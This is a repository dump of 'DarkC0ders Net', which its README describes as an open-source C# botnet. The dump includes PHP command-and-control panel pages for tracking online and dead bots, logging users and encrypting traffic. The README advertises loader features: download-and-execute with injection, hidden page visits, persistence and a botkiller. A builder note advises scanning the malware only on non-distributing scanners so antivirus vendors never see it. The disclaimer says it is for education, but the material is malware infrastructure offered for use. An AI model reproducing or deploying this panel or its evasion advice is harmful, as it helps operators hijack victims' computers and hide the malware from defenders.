https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/13.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/14.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/14.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/15.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/15.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/16.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/16.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/17.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/17.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/18.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/18.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/19.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/19.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/2.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/2.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/20.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/20.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/3.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/3.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/4.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/4.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/5.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/5.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/6.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/6.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/7.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/7.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/8.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/8.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/9.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/9.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/A.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/A.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/B.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/B.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/C.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/C.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/D.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/D.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/E.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/E.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/F.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/F.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/G.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/G.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/H.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/H.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/I.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/I.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/J.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/J.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/K.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/K.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/L.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/L.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/M.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/M.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/N.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/N.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/O.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/O.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/P.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/P.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/Q.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/Q.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/R.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/R.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/S.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/S.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/T.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/T.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/U.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/U.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/V.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/V.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/W.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/W.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/X.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/X.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/Y.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/Y.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/Z.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/Z.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/MINUS.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/MINUS.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/PLUS.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/PLUS.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/TIMES.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/TIMES.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/en/error.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/en/error.wav -------------------------------------------------------------------------------- /Panel/securimage/backgrounds/bg3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/backgrounds/bg3.jpg -------------------------------------------------------------------------------- /Panel/securimage/backgrounds/bg4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/backgrounds/bg4.jpg -------------------------------------------------------------------------------- /Panel/securimage/backgrounds/bg5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/backgrounds/bg5.jpg -------------------------------------------------------------------------------- /Panel/securimage/backgrounds/bg6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/backgrounds/bg6.png -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Bold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Bold.ttf -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Thin.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Thin.ttf -------------------------------------------------------------------------------- /Panel/securimage/database/securimage.sq3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/database/securimage.sq3 -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Bold.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Bold.woff -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Bold.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Bold.woff2 -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Light.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Light.ttf -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Light.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Light.woff -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Medium.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Medium.ttf -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Thin.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Thin.woff -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Thin.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Thin.woff2 -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Light.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Light.woff2 -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Medium.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Medium.woff -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Medium.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Medium.woff2 -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Regular.ttf -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Regular.woff -------------------------------------------------------------------------------- /Panel/assets/font/roboto/Roboto-Regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/roboto/Roboto-Regular.woff2 -------------------------------------------------------------------------------- /Panel/securimage/audio/noise/check-point-1.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/noise/check-point-1.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/noise/kids-playing-1.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/noise/kids-playing-1.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/noise/crowd-talking-1.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/noise/crowd-talking-1.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/noise/crowd-talking-6.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/noise/crowd-talking-6.wav -------------------------------------------------------------------------------- /Panel/securimage/audio/noise/crowd-talking-7.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/audio/noise/crowd-talking-7.wav -------------------------------------------------------------------------------- /Panel/assets/font/material-design-icons/Material-Design-Icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/material-design-icons/Material-Design-Icons.ttf -------------------------------------------------------------------------------- /Panel/assets/font/material-design-icons/Material-Design-Icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/material-design-icons/Material-Design-Icons.woff -------------------------------------------------------------------------------- /Panel/assets/font/material-design-icons/Material-Design-Icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/material-design-icons/Material-Design-Icons.woff2 -------------------------------------------------------------------------------- /Panel/assets/font/material-design-icons/Material-Design-Iconsd41d.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/font/material-design-icons/Material-Design-Iconsd41d.eot -------------------------------------------------------------------------------- /Panel/includes/404.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 |

The requested URL was not found on this server.

7 |
8 |
9 | -------------------------------------------------------------------------------- /Panel/pages/logout.php: -------------------------------------------------------------------------------- 1 | prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Logged out', UNIX_TIMESTAMP())"); 6 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 7 | 8 | unset($_SESSION['DarkC0ders']); 9 | session_destroy(); 10 | header("Location: login/"); 11 | ?> -------------------------------------------------------------------------------- /Panel/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Builder/README.md: -------------------------------------------------------------------------------- 1 | This is the builder for the bot. Below is a virus scan (created on a non-distributing scanner):
2 | https://spyralscanner.net/result.php?id=SWSkfdj9Ks 3 | 4 | Note that the virus scan above is false positives. MSIL.gen and Gen:Variant are detections from programs that "create" malware, not contain it. 5 | 6 | Some of the safe scanners you can use (non-distributing) are:
7 | http://nodistribute.com
8 | https://spyralscanner.net
9 | http://alphaproducts.online/?page=scanner
10 | http://avcheck.net - Not free
11 | https://antiscan.me - Not free
12 | 13 | 14 | If the site you wish to scan at is not listed here, you probably shouldn't use it to scan malware. 15 | -------------------------------------------------------------------------------- /Panel/includes/stats.php: -------------------------------------------------------------------------------- 1 | query("SELECT knock FROM settings LIMIT 1")->fetchColumn(0) * 60; 3 | $deadi = $odb->query("SELECT dead FROM settings LIMIT 1")->fetchColumn(0) * 86400; 4 | $o_sql = $odb->prepare("SELECT COUNT(*) FROM bots WHERE lastresponse + :on > UNIX_TIMESTAMP()"); 5 | $o_sql->execute(array(":on" => $knock + 120)); 6 | $d_sql = $odb->prepare("SELECT COUNT(*) FROM bots WHERE lastresponse + :d < UNIX_TIMESTAMP()"); 7 | $d_sql->execute(array(":d" => $deadi)); 8 | $online = number_format($o_sql->fetchColumn(0)); 9 | $dead = number_format($d_sql->fetchColumn(0)); 10 | $total = number_format($odb->query("SELECT COUNT(*) FROM bots")->fetchColumn(0)); 11 | $total_users = number_format($odb->query("SELECT COUNT(*) FROM users")->fetchColumn(0)); 12 | 13 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DarkC0ders Net 2 | 3 | [![N|Solid](https://image.ibb.co/hVWAO7/Untitled.png)](https://nodesource.com/products/nsolid) 4 | 5 | DarkC0ders net is a open source botnet which is programmed in C#, using the .NET 2.0 Framework. 6 | 7 | 8 | 9 | 10 | # Panel Features! 11 | 12 | - Fully responsive Materialize design 13 | - Real time Graphs 14 | - Ability to have more than 1 user 15 | - User privileges 16 | - Action logs for all users 17 | - Mobile/tab view optimized 18 | 19 | # HttpLoader Features! 20 | 21 | - Download & execute (with option to inject if native) 22 | - Visit webpage (visible or hidden) 23 | - Startup (with persistence) 24 | - Information about bot (aka. OS, version, installed location, etc.) 25 | - Basic botkiller (nothing fancy) 26 | - Update 27 | - Uninstall 28 | 29 | 30 | 31 | ### Warning 32 | 33 | 34 | 35 | 36 | > This is strictly for 37 | > educational purposes only. 38 | > I am not responsible anything 39 | > you may used this botnet for. 40 | 41 | ### Setup Guide 42 | 43 | * See [SETUP GUIDE.md](https://github.com/hashXploiter/darkcoders-net/blob/master/SETUP%20GUIDE.md) 44 | * See [Setup video](https://youtu.be/N9_gGDHRjTI) 45 | 46 | ### CMS Default Login Credentials 47 | 48 | 49 | 50 | ```sh 51 | user name : admin 52 | Password : admin 53 | ``` 54 | -------------------------------------------------------------------------------- /Panel/includes/footer.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 10 | 11 | 12 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /Panel/includes/config.php: -------------------------------------------------------------------------------- 1 | query("SELECT COUNT(*) FROM users WHERE username = '".$user[0]."'")->fetchColumn(0) == 0) 24 | { 25 | return false; 26 | }else{ 27 | $sel = $odb->query("SELECT * FROM users WHERE username = '".$user[0]."'"); 28 | $u = $sel->fetch(PDO::FETCH_ASSOC); 29 | if ($u['id'] != $user[1]) 30 | { 31 | return false; 32 | }else{ 33 | if ($u['status'] == "1") 34 | { 35 | return true; 36 | }else{ 37 | return false; 38 | } 39 | } 40 | } 41 | } 42 | } 43 | }else{ 44 | return false; 45 | } 46 | } 47 | $deckey = $odb->query("SELECT stub_id FROM settings LIMIT 1")->fetchColumn(0); 48 | 49 | function encrypt($key, $stre) 50 | { 51 | $rtn = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $stre, MCRYPT_MODE_CBC, $key); 52 | return base64_encode($rtn); 53 | } 54 | 55 | function decrypt($key, $strd) 56 | { 57 | $strd = str_replace("~", "+", $strd); 58 | $rtn = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, $key, base64_decode($strd), MCRYPT_MODE_CBC, $key); 59 | $rtn = rtrim($rtn, "\0\4"); 60 | return $rtn; 61 | } 62 | ?> 63 | -------------------------------------------------------------------------------- /Panel/assets/css/assistance.css: -------------------------------------------------------------------------------- 1 | /* -------------------------------------------------+ 2 | Title: MateriAll - Admin Template 3 | Framework: Materialize 4 | Version: 1.0 stable 5 | Author: Jozef Dvorský, http://www.creatingo.com 6 | +-------------------------------------------------- */ 7 | 8 | .dynamic-color .col { 9 | padding: 6px; 10 | } 11 | .dynamic-color .col div { 12 | padding: 6px; 13 | } 14 | .grid-example .col { 15 | border: 1px solid #fff; 16 | background-color: #d5ecf7; 17 | } 18 | .shadow-example p { 19 | padding: 10px; 20 | text-align: center; 21 | color: #ffffff; 22 | background-color: #4dd0e1; 23 | } 24 | .valign-example { 25 | height:120px; 26 | margin-bottom:10px; 27 | background-color: #d5ecf7; 28 | } 29 | .valign-example h5{ 30 | width:100%; 31 | } 32 | .float-example .col { 33 | padding: 10px 20px 15px 20px; 34 | border: 1px solid #fff; 35 | background-color: #d5ecf7; 36 | } 37 | .images-example .card-panel { 38 | padding:20%; 39 | } 40 | .video-example .card-panel { 41 | padding:0; 42 | } 43 | .video-example video { 44 | display:block; 45 | } 46 | .icon-container .icon-preview { 47 | height: 110px; 48 | text-align: center; 49 | } 50 | .icon-container i { 51 | font-size: 2.8em; 52 | margin-bottom: 6px; 53 | color:#546e7a; 54 | } 55 | .icon-container span { 56 | display: block; 57 | } 58 | #staggered-test li, #image-test { 59 | opacity: 0; 60 | } 61 | .pinned { 62 | margin-top: 74px; 63 | } 64 | .toc-wrapper { 65 | padding-left: 24px; 66 | } 67 | .waves-color-demo .collection-item { 68 | height: 57px; 69 | line-height: 57px; 70 | } 71 | @media only screen and (max-width: 480px) { 72 | .waves-color-demo .collection-item { 73 | height: auto; 74 | line-height: 57px; 75 | text-align:center; 76 | } 77 | 78 | .waves-color-demo .secondary-content , .waves-color-demo .language-markup{ 79 | float: none; 80 | display: block !important; 81 | text-align:center; 82 | margin-left:auto; 83 | margin-right:auto; 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /Panel/assets/css/styles.css: -------------------------------------------------------------------------------- 1 | .side-nav li.logo { 2 | background-color: #fff; 3 | } 4 | .primary-color { 5 | background-color: #1e88e5 !important; 6 | } 7 | .select-wrapper { 8 | margin-left: 45px; 9 | } 10 | input[type=text].valid { 11 | border-bottom: 1px solid #1e88e5; 12 | box-shadow: 0 1px 0 0 #1e88e5; 13 | } 14 | input[type=text].valid + label{ 15 | color : #1e88e5; 16 | } 17 | input[type=text]:focus:not([readonly]) { 18 | border-bottom: 1px solid #1e88e5; 19 | box-shadow: 0 1px 0 0 #1e88e5; 20 | } 21 | input[type=text]:focus:not([readonly]) + label{ 22 | color : #1e88e5; 23 | } 24 | input[type=email].valid { 25 | border-bottom: 1px solid #1e88e5; 26 | box-shadow: 0 1px 0 0 #1e88e5; 27 | } 28 | input[type=email].valid + label{ 29 | color : #1e88e5; 30 | } 31 | input[type=email]:focus:not([readonly]) { 32 | border-bottom: 1px solid #1e88e5; 33 | box-shadow: 0 1px 0 0 #1e88e5; 34 | } 35 | input[type=email]:focus:not([readonly]) + label{ 36 | color : #1e88e5; 37 | } 38 | input[type=password].valid { 39 | border-bottom: 1px solid #1e88e5; 40 | box-shadow: 0 1px 0 0 #1e88e5; 41 | } 42 | input[type=password].valid + label{ 43 | color : #1e88e5; 44 | } 45 | input[type=password]:focus:not([readonly]) { 46 | border-bottom: 1px solid #1e88e5; 47 | box-shadow: 0 1px 0 0 #1e88e5; 48 | } 49 | input[type=password]:focus:not([readonly]) + label{ 50 | color : #1e88e5; 51 | } 52 | input[type=date].valid { 53 | border-bottom: 1px solid #1e88e5; 54 | box-shadow: 0 1px 0 0 #1e88e5; 55 | } 56 | input[type=date].valid + label{ 57 | color : #1e88e5; 58 | } 59 | input[type=date]:focus:not([readonly]) { 60 | border-bottom: 1px solid #1e88e5; 61 | box-shadow: 0 1px 0 0 #1e88e5; 62 | } 63 | input[type=date]:focus:not([readonly]) + label{ 64 | color : #1e88e5; 65 | } 66 | .input-field .prefix.active { 67 | color: #1e88e5; 68 | } 69 | .picker__day--selected, .picker__day--selected:hover, .picker--focused .picker__day--selected { 70 | background-color: #1e88e5; 71 | } 72 | .picker__close, .picker__today { 73 | color: #1e88e5; 74 | } 75 | .picker__day.picker__day--today { 76 | color: #1e88e5; 77 | } 78 | .brand-logo { 79 | background-color: #fff; 80 | } -------------------------------------------------------------------------------- /Panel/pages/logs.php: -------------------------------------------------------------------------------- 1 | 4 |
5 |
6 |
7 | You do not have permission to view this page.
'; 11 | die(); 12 | } 13 | if (isset($_POST['doClear'])) 14 | { 15 | $odb->query("TRUNCATE plogs"); 16 | echo '
All logs have been cleared.
'; 17 | } 18 | ?> 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | query("SELECT * FROM plogs ORDER BY date DESC"); 33 | while ($l = $logs->fetch(PDO::FETCH_ASSOC)) 34 | { 35 | $id = $l['id']; 36 | $user = $l['username']; 37 | $ip = $l['ipaddress']; 38 | $action = $l['action']; 39 | $ldate = $l['date']; 40 | $date = date("m-d-Y, h:i A", $ldate); 41 | $flag = strtolower(geoip_country_code_by_addr($gi, $ip)); 42 | echo ''; 43 | } 44 | ?> 45 | 46 |
#UsernameIP AddressActionDate
'.$id.''.$user.''.$ip.' '.$action.''.$date.'
47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 69 |
70 | 75 | -------------------------------------------------------------------------------- /Panel/assets/js/initialize.js: -------------------------------------------------------------------------------- 1 | /* -------------------------------------------------+ 2 | Title: Mate Rio - Admin Template 3 | Framework: Materialize 4 | Version: 1.0 stable 5 | Author: Jozef Dvorský, http://www.creatingo.com 6 | +-------------------------------------------------- */ 7 | 8 | (function($){ 9 | $(function(){ 10 | 11 | "use strict"; 12 | 13 | var window_width = $(window).width(); 14 | 15 | // Color Palette - convert rgb to hex value string 16 | function rgb2hex(rgb) { 17 | if (/^#[0-9A-F]{6}$/i.test(rgb)) { return rgb; } 18 | 19 | rgb = rgb.match(/^rgb\((\d+),\s*(\d+),\s*(\d+)\)$/); 20 | 21 | if (rgb === null) { return "N/A"; } 22 | 23 | function hex(x) { 24 | return ("0" + parseInt(x).toString(16)).slice(-2); 25 | } 26 | 27 | return "#" + hex(rgb[1]) + hex(rgb[2]) + hex(rgb[3]); 28 | } 29 | 30 | // Color Palette - auto add color captions 31 | $('.dynamic-color .col').each(function () { 32 | $(this).children().each(function () { 33 | var color = $(this).css('background-color'), 34 | classes = $(this).attr('class'); 35 | $(this).html(rgb2hex(color) + " " + classes); 36 | if (classes.indexOf("darken") >= 0 || $(this).hasClass('black')) { 37 | $(this).css('color', 'rgba(255,255,255,.9'); 38 | } else { 39 | $(this).css('color', 'rgba(0,0,0,.9'); 40 | } 41 | }); 42 | }); 43 | 44 | $('.slider').slider({full_width: true}); 45 | $('.button-collapse').sideNav(); 46 | $('.datepicker').pickadate({selectYears: 20}); 47 | $('select').not('.disabled').material_select(); 48 | $('.materialboxed').materialbox(); 49 | $('.modal-trigger').leanModal(); 50 | $('.tabs-wrapper').pushpin({ top: 240 }); 51 | $('.scrollspy').scrollSpy(); 52 | 53 | 54 | // Handlig window resize actions, after resize event is done 55 | 56 | var rtime; 57 | var timeout = false; 58 | var delta = 200; 59 | $(window).resize(function() { 60 | rtime = new Date(); 61 | if (timeout === false) { 62 | timeout = true; 63 | setTimeout(resizeend, delta); 64 | } 65 | }); 66 | 67 | function resizeend() { 68 | if (new Date() - rtime < delta) { 69 | setTimeout(resizeend, delta); 70 | } else { 71 | timeout = false; 72 | // Here goes custom actions 73 | $('#slide-menu').simplebar('recalculate'); 74 | } 75 | } 76 | 77 | 78 | // Set checkbox on forms.html to indeterminate 79 | var indeterminateCheckbox = document.getElementById('indeterminate-checkbox'); 80 | if (indeterminateCheckbox !== null) 81 | indeterminateCheckbox.indeterminate = true; 82 | 83 | 84 | // Floating-Fixed table of contents 85 | if ($('nav').length) { 86 | $('.toc-wrapper').pushpin({ top: $('nav').height() }); 87 | } 88 | else if ($('#index-banner').length) { 89 | $('.toc-wrapper').pushpin({ top: $('#index-banner').height() }); 90 | } 91 | else { 92 | $('.toc-wrapper').pushpin({ top: 0 }); 93 | } 94 | 95 | }); // end of document ready 96 | })(jQuery); // end of jQuery name space -------------------------------------------------------------------------------- /Panel/pages/bots.php: -------------------------------------------------------------------------------- 1 | 4 |
5 |
6 |

Bots

7 | 8 |
9 |
